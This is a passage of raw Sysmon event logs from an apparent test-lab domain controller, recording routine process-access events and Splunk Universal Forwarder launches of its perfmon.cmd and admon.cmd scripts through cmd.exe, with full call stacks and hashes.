Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006115Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.697{D28789B6-7CE2-5FA1-4E01-000000008801}2500C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006114Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4D01-000000008801}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006113Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006112Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006111Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006110Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006109Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006108Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006107Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006106Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006105Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006104Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4D01-000000008801}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006103Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.586{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE2-5FA1-4D01-000000008801}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006102Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.587{D28789B6-7CE2-5FA1-4D01-000000008801}1736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006101Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4C01-000000008801}2836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006100Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006099Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006098Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006097Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006096Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006095Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006094Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006093Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006092Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006091Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4C01-000000008801}2836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006090Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.476{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE2-5FA1-4C01-000000008801}2836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program 